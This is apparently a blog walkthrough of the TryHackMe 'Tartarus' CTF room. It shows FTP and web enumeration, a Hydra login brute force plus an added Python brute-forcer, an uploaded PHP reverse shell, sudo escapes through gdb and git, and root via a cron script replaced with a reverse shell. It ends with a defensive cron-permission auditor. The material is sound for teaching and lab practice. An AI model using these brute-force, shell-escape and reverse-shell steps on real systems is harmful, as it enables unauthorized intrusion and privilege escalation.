The skills tested in this room are: nmap, gobuster, hydra, Burp Suite, privilege escalation, cron jobs, and nc (netcat). The room has three privilege escalations: two horizontal (lateral) moves from one user to another, and a final vertical one to root.
This room was released on 8/13/2020, and I wanted to see if I could crack it. This room is rated easy in terms of difficulty, but I thought it was more challenging than easy, mainly because I haven't used vim and it was the only editor available. Yeah... yeah... you can laugh at me for being a nano user. lol
I also chose to mask part of the answers so you will have to do the steps I took and see how things work. I don’t want to take away this learning experience from you.
Shoutout to the room creator, @csenox. You can access the room at https://tryhackme.com/room/tartarus
I was assigned a victim IP address of 10.10.215.66 to attack. You will be assigned a different IP address, so double check your entries when following this walk-through.
We only need to retrieve the user flag and the root flag to complete the room:
- User flag:
- Root flag:
1. Deploy the machine to get a victim IP address:
2. Scan the machine for open ports and services by using nmap. Use the command: nmap -sC -sV -oG nmap/tartarus 10.10.215.66
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oG nmap/tartarus – to save the results of the scan in grepable format to a file named tartarus inside the nmap directory (create that directory first; nmap will not create it for you)
3. The nmap scan result shows that anonymous FTP login is allowed. Log in to FTP by typing ftp 10.10.215.66, enter anonymous as the username, and leave the password blank:
4. Search for any interesting files by typing ls -la:
- The screenshot above is a trick. There is nothing helpful inside test.txt; the interesting part is the directory whose name is just dots (…). A normal ls -la listing shows only two dot entries: . (the current directory) and .. (its parent). A third dot-named entry is a real directory given a name chosen to blend in with those two. Compare with the listing below, taken from my personal machine:
5. Search the interestingly named (…) directory:
6. Search the (…) directory inside the (…) directory:
7. Download the yougotgoodeyes.txt file to our attack machine (Kali) by typing get yougotgoodeyes.txt
8. Open the file to see what is in it by typing cat yougotgoodeyes.txt
9. Open a browser to check what is running on port 80:
10. Check the page source; there is no hidden message there. Let's use gobuster to search for hidden directories and files by typing gobuster dir -u http://10.10.215.66 -w /usr/share/wordlists/dirb/common.txt
- dir – to use directory/file brute-forcing mode
- -u – is the flag to tell gobuster that we are scanning a URL
- -w /usr/share/wordlists/dirb/common.txt – is the flag to set the wordlist of possible directory and file names
11. Check the content of the /robots.txt file by going to your web browser and type 10.10.215.66/robots.txt in the URL bar:
12. Go and check the /admin-dir that we found in the robots.txt file by typing 10.10.215.66/admin-dir in your browser’s URL bar:
- We still don't know where to use the credentials that we found. We could try to brute-force SSH with them, but first I want to enumerate /admin-dir for any more helpful files and directories.
13. Run gobuster again against /admin-dir by typing gobuster dir -u http://10.10.215.66/admin-dir -w /usr/share/wordlists/dirb/common.txt
14. Now, let’s go check the /sUp3r-s3cr3t directory we found in the FTP server:
- I tried default credentials like admin:admin, admin:password, root:root and they don’t work. We will have to use Hydra to brute-force this login form.
15. Use Burp Suite to capture the login request, which gives us the exact POST path, the parameter names and the failure message that Hydra needs:
16. Now we are going to use Hydra to brute-force the web login form. Type hydra -L userid -P credentials.txt 10.10.215.66 http-post-form "/sUp3r-s3cr3t/authenticate.php:username=^USER^&password=^PASS^:Incorrect Username"
- -L userid – to instruct hydra that we are using the userid file that contains a list of possible usernames
- -P credentials.txt – to instruct hydra that we are using the credentials.txt file that contains a list of possible passwords
- http-post-form "/sUp3r-s3cr3t/authenticate.php – tells hydra that the target is an HTTP POST login form at /sUp3r-s3cr3t/authenticate.php. The quoted argument has three colon-separated parts: the path, the POST body, and the failure string
- username=^USER^ – ^USER^ is the placeholder hydra replaces with each username from the list
- password=^PASS^ – ^PASS^ is the placeholder hydra replaces with each password from the list
- Incorrect Username – is the "failure string". Hydra treats any response that does not contain it as a successful login and otherwise moves on to the next username/password combination. Take it from the real failure response captured in Burp, and check how the form answers a valid username with a wrong password: if that message is different, this failure string alone will produce false positives (and the differing messages also leak which usernames exist)
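The same form brute force written out in Python, as an added example that is not part of the original walkthrough or of hydra. It assumes the form layout from the hydra command above (the target URL and the username/password field names) and generates its own canary password per user. What it adds is a guard against the failure-string problem described above: instead of one global failure string, each user's reply to a guaranteed-wrong password is recorded as that user's own failure baseline, a guess counts only when the reply differs from that baseline, and users whose baseline does not contain the failure string are reported, because hydra's check would mark every password for them as valid.

```python
import secrets
import urllib.parse
import urllib.request

# Assumed target and failure string, mirroring the hydra command above.
TARGET_URL = "http://10.10.215.66/sUp3r-s3cr3t/authenticate.php"
FAILURE_STRING = "Incorrect Username"


def http_post(url, fields):
    """Submit a URL-encoded form POST and return the response body as text.

    Real network I/O; the form field names are the ones hydra was given.
    """
    data = urllib.parse.urlencode(fields).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8", errors="replace")


def guess_logins(users, passwords, post=http_post, url=TARGET_URL,
                 failure_string=FAILURE_STRING):
    """Password-guess a login form using a per-user failure baseline.

    hydra's http-post-form treats any response lacking the failure string as
    a success, which is only safe if every failed login produces that string.
    Here each user first gets a random canary password that cannot be right;
    the reply to it is that user's failure baseline, and a guess is a hit
    only when the reply differs from it.

    Returns (hits, notes): hits is a list of (user, password) pairs; notes
    lists users whose failure baseline lacks the global failure string, i.e.
    users for whom hydra's check would report every password as valid.
    """
    hits, notes = [], []
    for user in users:
        canary = secrets.token_hex(16)  # 32 random hex chars, never a real password
        baseline = post(url, {"username": user, "password": canary})
        if failure_string not in baseline:
            notes.append(f"{user}: a wrong password does not yield "
                         f"{failure_string!r}; a global failure string would "
                         f"report every password for this user as valid")
        for password in passwords:
            body = post(url, {"username": user, "password": password})
            # Pages with per-request tokens or timestamps would need a
            # narrower comparison than whole-body equality.
            if body != baseline:
                hits.append((user, password))
                break  # one valid password per user is enough
    return hits, notes


if __name__ == "__main__":
    # Wordlists as in the walkthrough (userid and credentials.txt from
    # /admin-dir), one entry per line.
    with open("userid") as f:
        users = [line.strip() for line in f if line.strip()]
    with open("credentials.txt") as f:
        passwords = [line.strip() for line in f if line.strip()]
    found, warnings = guess_logins(users, passwords)
    for warning in warnings:
        print("note:", warning)
    for user, password in found:
        print(f"valid login: {user}:{password}")
```

Run it from the directory holding the two wordlists. The `post` argument exists so the logic can be exercised against a fake responder without a target; in a real engagement it also makes it easy to add delays or a proxy.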
17. Log in to the http://10.10.215.66/sUp3r-s3cr3t page:
- Now, the screenshot above is showing us that there might be other directories and pages inside the /sUp3r-s3cr3t directory. Let’s try and enumerate it using gobuster by typing gobuster dir -u http://10.10.215.66/sUp3r-s3cr3t -w /usr/share/wordlists/dirb/common.txt
18. Check the /images directory inside the /sUp3r-s3cr3t:
19. Test the upload page and see if we can open it inside the /sUp3r-s3cr3t/images/uploads folder. I created a file called test.txt:
20. Check the /sUp3r-s3cr3t/images/uploads if the test.txt is there and if we can open it.
21. Now that we know we can upload files, the next step is to upload a PHP reverse shell so we get a shell on the web server. I just googled "pentestmonkey PHP reverse shell" and got the result here. Go ahead and download the file:
22. We need to extract the file php-reverse-shell-1.0.tar.gz by typing tar -xzvf php-reverse-shell-1.0.tar.gz
23. Look for the file php-reverse-shell.php and set the $ip and $port variables near the top to your attack machine's IP address and the port you will listen on. Type nano php-reverse-shell.php (sudo is not needed; the file belongs to you)
24. The original walkthrough ran chmod +x php-reverse-shell.php here. This step is not needed: the file mode on your attack machine is not carried over by the HTTP upload, and the web server executes the PHP code whether or not the execute bit is set.
25. Upload our payload:
26. Before we execute the payload, we have to setup a listener on our attack machine by typing nc -nlvp 9999. Be sure that the port number you choose on your listener matches the one that you entered in the php-reverse-shell.php payload:
27. Browse to /sUp3r-s3cr3t/images/uploads and click the uploaded php-reverse-shell.php; the web server executes it and the shell connects back to our listener:
- Our listener connected successfully, we now have a reverse-shell:
28. Let’s convert this to a more stable shell by checking if python is running on the victim machine by typing which python
29. Now, the conversion to a more stable shell by typing python -c 'import pty;pty.spawn("/bin/bash")'
30. We are in. Let's locate the user flag by typing find / -name user.txt 2>/dev/null. I like adding 2>/dev/null so the permission-denied errors go to /dev/null and we don't have to scroll through them to find the file we have access to:
31. Open the user.txt file by typing cat /home/d4rckh/user.txt
- Besides the user.txt file there was another file called cleanup.py.
32. Let's check whether our current user, www-data, has any sudo privilege by typing sudo -l
- sudo -l shows that www-data may run /var/www/gdb as user thirtytwo. Let's check GTFOBins for a way to get a shell out of gdb:
33. We use -u with sudo so the command runs as user thirtytwo, the user specified in the sudo -l output from Step 32. Type sudo -u thirtytwo /var/www/gdb -nx -ex '!sh' -ex quit
34. Again, spawn a more stable shell with python -c 'import pty;pty.spawn("/bin/bash")' and check whether there is any interesting file in user thirtytwo's home directory:
35. Open note.txt by typing cat note.txt
36. Type sudo -l to check what other sudo privileges can we find in user thirtytwo
37. Check GTFObins again to exploit git
38. Type sudo -u d4rckh /usr/bin/git -p help config and then, at the pager prompt, !/bin/sh
- Still nothing new except the cleanup.py file, and sudo -l shows nothing for d4rckh. Looking at cleanup.py, it looks like a script that removes whatever is inside the /home/cleanup/ directory. Let's check /etc/crontab to see whether this script runs on a schedule by typing cat /etc/crontab
- The crontab runs cleanup.py as root, but the script lives in d4rckh's home directory, where we have write access. A root cron job that executes a file an unprivileged user controls is the vulnerability here: we can replace cleanup.py with a reverse shell and root will run it for us.
39. Nano doesn't work for editing cleanup.py; the only editor that works is vim, and I struggle with vim, so what I did next was simply to create a new file and keep the name cleanup.py, because that is the file named in crontab. First, rename the current cleanup.py by typing mv cleanup.py cleanup.py.old
40. Let's create a new cleanup.py with a reverse-shell payload by typing vim cleanup.py, and check PentestMonkey for a Python reverse shell that we can use:
- New cleanup.py file
41. Set up the listener on your Kali machine by typing nc -nlvp 8888 (the port must match the one in the new cleanup.py) and wait up to 2 minutes for cron to run the new cleanup.py; the shell connects back:
42. Check who we are by typing whoami
43. Finally, open root.txt by typing cat root.txt
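A small auditor for the condition exploited in steps 38 to 43, written as an added example (not code from the room or from the walkthrough): a root cron job that executes a script in a location an unprivileged user can write. It parses /etc/crontab in the system format (where the sixth field is the user) and, for every root job, checks whether any absolute path in the command, or the directory containing it, is owned by a non-root user or is group- or world-writable. A writable directory is enough on its own, because, as in step 39, the script can be renamed and replaced without ever modifying the original file. The embedded crontab lines are constructed to mirror the walkthrough (an every-two-minutes root job on /home/d4rckh/cleanup.py); the interpreter path and the other jobs are assumptions.

```python
import os
import shlex
import stat

# Constructed sample in /etc/crontab (system crontab) format.  The root job
# on cleanup.py mirrors the walkthrough; the other lines are illustrative.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    /usr/bin/python3 /home/d4rckh/cleanup.py
0 3     * * *   backup  /usr/local/bin/backup.sh
"""


def parse_system_crontab(text):
    """Yield (user, argv) for each job line of a system-style crontab."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment, or a VAR=value environment line
        if line.startswith("@"):  # @reboot / @daily style schedule
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            user, command = fields[1], fields[2]
        else:  # m h dom mon dow user command
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            user, command = fields[5], fields[6]
        try:
            yield user, shlex.split(command)
        except ValueError:  # unbalanced quotes: fall back to a plain split
            yield user, command.split()


def real_stat(path):
    """Return (uid, gid, permission bits) for path, or None if it is missing."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return st.st_uid, st.st_gid, stat.S_IMODE(st.st_mode)


def writable_by_unprivileged(info):
    """True if a non-root user could write (or replace) the object."""
    uid, gid, mode = info
    if uid != 0:
        return True  # a non-root owner can chmod and rewrite it at will
    if gid != 0 and mode & stat.S_IWGRP:
        return True  # writable by members of a non-root group
    return bool(mode & stat.S_IWOTH)  # world-writable


def audit(crontab_text, stat_fn=real_stat):
    """List (path, kind, command) for root jobs touching writable paths.

    Every absolute path in a root job's command is checked, together with its
    parent directory, since a writable directory lets the script be swapped.
    """
    findings = []
    for user, argv in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for token in argv:
            if not token.startswith("/"):
                continue  # only absolute paths are resolved here
            checks = ((token, "file"), (os.path.dirname(token), "directory"))
            for path, kind in checks:
                info = stat_fn(path)
                if info is not None and writable_by_unprivileged(info):
                    findings.append((path, kind, " ".join(argv)))
    return findings


if __name__ == "__main__":
    try:
        with open("/etc/crontab") as f:
            text = f.read()
    except OSError:
        text = SAMPLE_CRONTAB  # no readable system crontab: use the sample
    for path, kind, command in audit(text):
        print(f"root job {command!r}: {kind} {path} is writable by a non-root user")
```

Run it as any user on the target; the check needs no privileges beyond reading /etc/crontab. The `stat_fn` parameter takes a lookup function so the logic can be tested against a fake permission table, and it is also where you would plug in the contents of /etc/cron.d or per-user crontabs if you extend the scan.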
Hope you enjoyed it and learned something too!
Don’t forget to subscribe to my blog!